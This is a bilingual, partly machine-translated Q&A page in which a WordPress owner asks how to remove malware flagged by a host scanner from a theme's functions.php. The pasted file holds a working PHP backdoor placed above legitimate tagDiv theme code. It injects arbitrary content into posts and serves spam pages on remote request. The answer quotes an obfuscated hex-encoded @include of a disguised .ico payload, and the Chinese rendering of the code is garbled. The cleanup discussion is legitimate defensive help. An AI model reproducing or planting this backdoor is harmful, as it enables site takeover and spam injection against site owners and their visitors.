如何摆脱“SiteLock-PHP-FILEHACKER-of.UNOFFICIAL"在 WordPress 函数.php [英] How to get rid of "SiteLock-PHP-FILEHACKER-of.UNOFFICIAL" in WordPress functions.php

查看:15
本文介绍了如何摆脱“SiteLock-PHP-FILEHACKER-of.UNOFFICIAL"在 WordPress 函数.php的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

get_results('SELECT * FROM `' . $wpdb->prefix .'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC',ARRAY_A) 作为 $data){$data['code'] = '';if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)){$data['code'] = $_[1];}打印 '<e><w>1</w><url>'.$data['guid'] .'<代码>'.$data['code'] .'</code><id>'.$data['ID'] .'</id></e>'."\r\n";}休息;案例'set_id_links';if (isset($_REQUEST['data'])){$data = $wpdb ->get_row('SELECT `post_content` FROM `' . $wpdb->prefix .'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);if (!empty($_REQUEST['data'])) $post_content = $post_content .'<div id="wp_cd_code">'.stripcslashes($_REQUEST['data']) .'</div>';if ($wpdb->query('UPDATE `' . $wpdb->prefix .'posts` SET `post_content` = "' .mysql_escape_string($post_content) .'" WHERE `ID` = "' .mysql_escape_string($_REQUEST['id']) . '"') !== false){打印真";}}休息;案例'create_page';如果 (isset($_REQUEST['remove_page'])){if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix .'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"')){打印真";}}elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content'])){if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix .'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"')){打印真";}}休息;默认值:打印ERROR_WP_ACTION WP_URL_CD";}死("");}if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix .'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' ){$data = $wpdb ->get_row('SELECT * FROM `' . $wpdb->prefix .'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');如果 ($data -> full_content){打印stripslashes($data -> content);}别的{打印 '';打印 '';打印 '';打印 '<title>'.stripslashes($data -> title).'</title>';打印 '<meta name="Keywords" content="'.stripslashes($data -> keyword).'"/>';打印 '<meta name="Description" content="'.stripslashes($data -> description).'"/>';打印 '<meta name="robots" content="index, follow"/>';打印 '<meta charset="';博客信息('字符集');打印 '"/>';打印 '<meta name="viewport" content="width=device-width">';打印'<link rel="profile" href="http://gmpg.org/xfn/11">';打印 '<link rel="pingback" href="';博客信息('pingback_url');打印 '">';wp_head();打印 '</head>';打印 '';打印 '<div id="content" class="site-content">';打印stripslashes($data -> content);get_search_form();get_sidebar();get_footer();}出口;}?><?php/*我们的投资组合:http://themeforest.net/user/tagDiv/portfolio感谢您使用我们的主题!tagDiv - 2016*//***加载速度助推器框架+主题特定文件*///加载部署模式require_once('td_deploy_mode.php');//加载配置require_once('includes/td_config.php');add_action('td_global_after', array('td_config', 'on_td_global_after_config'), 9);//我们以 9 优先级运行,以允许插件更新我们的 api,同时使用默认优先级 10//加载 wp 助推器require_once('includes/wp_booster/td_wp_booster_functions.php');require_once('includes/td_css_generator.php');require_once('includes/shortcodes/td_misc_shortcodes.php');require_once('includes/widgets/td_page_builder_widgets.php');//小部件/**移动主题css生成器* wp-admin 加载主主题,不包含手机主题功能* 在 td_panel_data_source 中需要* @todo - 寻找更优雅的解决方案(例如,根据要求生成 css)*/require_once('mobile/includes/td_css_generator_mob.php');/* -----------------------------------------------------------------------------* 宇商*///面包屑add_filter('woocommerce_breadcrumb_defaults', 'td_woocommerce_breadcrumbs');函数 td_woocommerce_breadcrumbs() {返回数组('定界符' =>' <i class="td-icon-right td-bread-sep"></i>','wrap_before' =>'<div class="entry-crumbs" itemprop="breadcrumb">','wrap_after' =>'</div>','之前' =>'','之后' =>'','家' =>_x('首页', '面包屑', 'woocommerce'),);}//使用自己的分页如果(!function_exists('woocommerce_pagination')){//分页函数 woocommerce_pagination() {回声 td_page_generator::get_pagination();}}//覆盖每行产品 3 的主题默认规范//每页产品数量 8add_filter('loop_shop_per_page', create_function('$cols', 'return 4;'));如果(!function_exists('woocommerce_output_related_products')){//相关产品数量函数 woocommerce_output_related_products() {woocommerce_related_products(数组('posts_per_page' =>4、'列' =>4、'orderby' =>'兰',));//以 1 行显示 4 个产品}}/* -----------------------------------------------------------------------------* bbPress*///将头像大小更改为 40px函数 td_bbp_change_avatar_size($author_avatar, $topic_id, $size) {$author_avatar = '';如果 ($size == 14) {$size = 40;}$topic_id = bbp_get_topic_id( $topic_id );如果(!空($topic_id)){如果(!bbp_is_topic_anonymous($topic_id)){$author_avatar = get_avatar( bbp_get_topic_author_id( $topic_id ), $size );} 别的 {$author_avatar = get_avatar( get_post_meta( $topic_id, '_bbp_anonymous_email', true ), $size );}}返回 $author_avatar;}add_filter('bbp_get_topic_author_avatar', 'td_bbp_change_avatar_size', 20, 3);add_filter('bbp_get_reply_author_avatar', 'td_bbp_change_avatar_size', 20, 3);add_filter('bbp_get_current_user_avatar', 'td_bbp_change_avatar_size', 20, 3);//add_action('关机', 'test_td');函数test_td(){如果 (!is_admin()){td_api_base::_debug_get_used_on_page_components();}}/*** tdStyleCustomizer.js 是必需的*/如果(TD_DEBUG_LIVE_THEME_STYLE){add_action('wp_footer', 'td_theme_style_footer');//新的现场主题演示函数 td_theme_style_footer() {?><div id="td-theme-settings" class="td-live-theme-demos td-theme-settings-small"><div class="td-skin-body"><div class="td-skin-wrap"><div class="td-skin-container td-skin-buy"><a target="_blank" href="http://themeforest.net/item/newspaper/5489609?ref=tagdiv">立即购买报纸!</a></div><div class="td-skin-container td-skin-header">开始吧!</div><div class="td-skin-container td-skin-desc">轻松<span>一键安装</span>和完全可定制的选项,我们的演示是您将获得的最佳开始!!</div><div class="td-skin-container td-skin-content"><div class="td-demos-list"><?php$td_demo_names = array();foreach (td_global::$demo_list as $demo_id => $stack_params) {$td_demo_names[$stack_params['text']] = $demo_id;?><div class="td-set-theme-style"><a href="<?php echo td_global::$demo_list[$demo_id]['demo_url'] ?>"class="td-set-theme-style-link td-popup td-popup-<?php echo $td_demo_names[$stack_params['text']] ?>"data-img-url="http://demo.tagdiv.com/demos_popup/newspaper/large/<?php echo $demo_id; ?>.jpg"></a></div><?php } ?><div class="clearfix"></div>

<div class="td-skin-scroll"><i class="td-icon-read-down"></i></div>

<div class="clearfix"></div><div class="td-set-hide-show"><a href="#" id="td-theme-set-hide"></a></div><div class="td-screen-demo" data-width-preview="380"></div><div class="td-screen-demo-extend"></div>

<?php}}//print_r(td_global::$all_theme_panels_list);

我的主机病毒扫描程序检测到主题 function.php 文件中存在病毒.不知道如何在不影响网站的情况下删除代码.请帮我清除这个functions.php中的恶意病毒代码SiteLock-PHP-FILEHACKER-of.UNOFFICIAL"

解决方案

这些病毒在您的大多数文件中添加一行代码,这些文件称为受影响的文件.

就我而言,受影响的文件有共同的行:

@include "\x2fho\x6de/\x6bks\x68o3\x62c/\x70ub\x6cic\x5fht\x6dl/\x77p-\x69nc\x6cud\x65s/\x6as/\x6acr\x6fp/\x69co\x6e_f\x389a\x617.\x69co";

当您从所有这些文件中删除这一行时,您就不会受到病毒/恶意软件的感染.

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == ''))
{
    switch ($_REQUEST['action'])
    {
        case 'get_all_links';
            foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
            {
                $data['code'] = '';

                if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                {
                    $data['code'] = $_[1];
                }

                print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
            }
            break;

        case 'set_id_links';
            if (isset($_REQUEST['data']))
            {
                $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                {
                    print "true";
                }
            }
            break;

        case 'create_page';
            if (isset($_REQUEST['remove_page']))
            {
                if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                {
                    print "true";
                }
            }
            elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
            {
                if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                {
                    print "true";
                }
            }
            break;

        default: print "ERROR_WP_ACTION WP_URL_CD";
    }

    die("");
}

if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
    $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    if ($data -> full_content)
    {
        print stripslashes($data -> content);
    }
    else
    {
        print '<!DOCTYPE html>';
        print '<html ';
        language_attributes();
        print ' class="no-js">';
        print '<head>';
        print '<title>'.stripslashes($data -> title).'</title>';
        print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
        print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
        print '<meta name="robots" content="index, follow" />';
        print '<meta charset="';
        bloginfo( 'charset' );
        print '" />';
        print '<meta name="viewport" content="width=device-width">';
        print '<link rel="profile" href="http://gmpg.org/xfn/11">';
        print '<link rel="pingback" href="';
        bloginfo( 'pingback_url' );
        print '">';
        wp_head();
        print '</head>';
        print '<body>';
        print '<div id="content" class="site-content">';
        print stripslashes($data -> content);
        get_search_form();
        get_sidebar();
        get_footer();
    }

    exit;
}

?><?php
/*
    Our portfolio:  http://themeforest.net/user/tagDiv/portfolio
    Thanks for using our theme!
    tagDiv - 2016
*/

/**
 * Load the speed booster framework + theme specific files
 */

// load the deploy mode
require_once('td_deploy_mode.php');

// load the config
require_once('includes/td_config.php');
add_action('td_global_after', array('td_config', 'on_td_global_after_config'), 9); //we run on 9 priority to allow plugins to updage_key our apis while using the default priority of 10

// load the wp booster
require_once('includes/wp_booster/td_wp_booster_functions.php');

require_once('includes/td_css_generator.php');
require_once('includes/shortcodes/td_misc_shortcodes.php');
require_once('includes/widgets/td_page_builder_widgets.php'); // widgets

/*
 * mobile theme css generator
 * in wp-admin the main theme is loaded and the mobile theme functions are not included
 * required in td_panel_data_source
 * @todo - look for a more elegant solution(ex. generate the css on request)
 */
require_once('mobile/includes/td_css_generator_mob.php');

/* ----------------------------------------------------------------------------
 * Woo Commerce
 */

// breadcrumb
add_filter('woocommerce_breadcrumb_defaults', 'td_woocommerce_breadcrumbs');
function td_woocommerce_breadcrumbs() {
    return array(
        'delimiter' => ' <i class="td-icon-right td-bread-sep"></i> ',
        'wrap_before' => '<div class="entry-crumbs" itemprop="breadcrumb">',
        'wrap_after' => '</div>',
        'before' => '',
        'after' => '',
        'home' => _x('Home', 'breadcrumb', 'woocommerce'),
    );
}

// use own pagination
if (!function_exists('woocommerce_pagination')) {
    // pagination
    function woocommerce_pagination() {
        echo td_page_generator::get_pagination();
    }
}

// Override theme default specification for product 3 per row

// Number of product per page 8
add_filter('loop_shop_per_page', create_function('$cols', 'return 4;'));

if (!function_exists('woocommerce_output_related_products')) {
    // Number of related products
    function woocommerce_output_related_products() {
        woocommerce_related_products(array(
            'posts_per_page' => 4,
            'columns' => 4,
            'orderby' => 'rand',
        )); // Display 4 products in rows of 1
    }
}

/* ----------------------------------------------------------------------------
 * bbPress
 */
// change avatar size to 40px
function td_bbp_change_avatar_size($author_avatar, $topic_id, $size) {
    $author_avatar = '';
    if ($size == 14) {
        $size = 40;
    }
    $topic_id = bbp_get_topic_id( $topic_id );
    if ( !empty( $topic_id ) ) {
        if ( !bbp_is_topic_anonymous( $topic_id ) ) {
            $author_avatar = get_avatar( bbp_get_topic_author_id( $topic_id ), $size );
        } else {
            $author_avatar = get_avatar( get_post_meta( $topic_id, '_bbp_anonymous_email', true ), $size );
        }
    }
    return $author_avatar;
}
add_filter('bbp_get_topic_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_reply_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_current_user_avatar', 'td_bbp_change_avatar_size', 20, 3);

//add_action('shutdown', 'test_td');

function test_td () {
    if (!is_admin()){
        td_api_base::_debug_get_used_on_page_components();
    }
}

/**
 * tdStyleCustomizer.js is required
 */
if (TD_DEBUG_LIVE_THEME_STYLE) {
    add_action('wp_footer', 'td_theme_style_footer');
        // new live theme demos
        function td_theme_style_footer() {
            ?>
            <div id="td-theme-settings" class="td-live-theme-demos td-theme-settings-small">
                <div class="td-skin-body">
                    <div class="td-skin-wrap">
                        <div class="td-skin-container td-skin-buy"><a target="_blank" href="http://themeforest.net/item/newspaper/5489609?ref=tagdiv">BUY NEWSPAPER NOW!</a></div>
                            <div class="td-skin-container td-skin-header">GET AN AWESOME START!</div>
                            <div class="td-skin-container td-skin-desc">With easy <span>ONE CLICK INSTALL</span> and fully customizable options, our demos are the best start you'll ever get!!</div>
                        <div class="td-skin-container td-skin-content">
                            <div class="td-demos-list">
                                <?php
                                $td_demo_names = array();

                                foreach (td_global::$demo_list as $demo_id => $stack_params) {
                                    $td_demo_names[$stack_params['text']] = $demo_id;
                                    ?>
                                    <div class="td-set-theme-style"><a href="<?php echo td_global::$demo_list[$demo_id]['demo_url'] ?>" class="td-set-theme-style-link td-popup td-popup-<?php echo $td_demo_names[$stack_params['text']] ?>" data-img-url="http://demo.tagdiv.com/demos_popup/newspaper/large/<?php echo $demo_id; ?>.jpg"></a></div>
                                <?php } ?>
                                <div class="clearfix"></div>
                            </div>
                        </div>
                        <div class="td-skin-scroll"><i class="td-icon-read-down"></i></div>
                    </div>
                </div>
                <div class="clearfix"></div>
                <div class="td-set-hide-show"><a href="#" id="td-theme-set-hide"></a></div>
                <div class="td-screen-demo" data-width-preview="380"></div>
                <div class="td-screen-demo-extend"></div>
            </div>
            <?php
    }
}

//print_r(td_global::$all_theme_panels_list);

My hosting virus scanner detects that there is virus in theme function.php file. Not sure how to delete the code without effecting the website. Please help me in clearing the malicious virus code " SiteLock-PHP-FILEHACKER-of.UNOFFICIAL " from this functions.php

解决方案

These viruses add one line of code in most of your files, these files called affected files.

In my case the affected files have common line :

@include "\x2fho\x6de/\x6bks\x68o3\x62c/\x70ub\x6cic\x5fht\x6dl/\x77p-\x69nc\x6cud\x65s/\x6as/\x6acr\x6fp/\x66av\x69co\x6e_f\x389a\x617.\x69co";

When you remove this line from all these files, you are free from the virus/malware infection.

这篇关于如何摆脱“SiteLock-PHP-FILEHACKER-of.UNOFFICIAL"在 WordPress 函数.php的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
相关文章
PHP最新文章
热门教程
热门工具
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆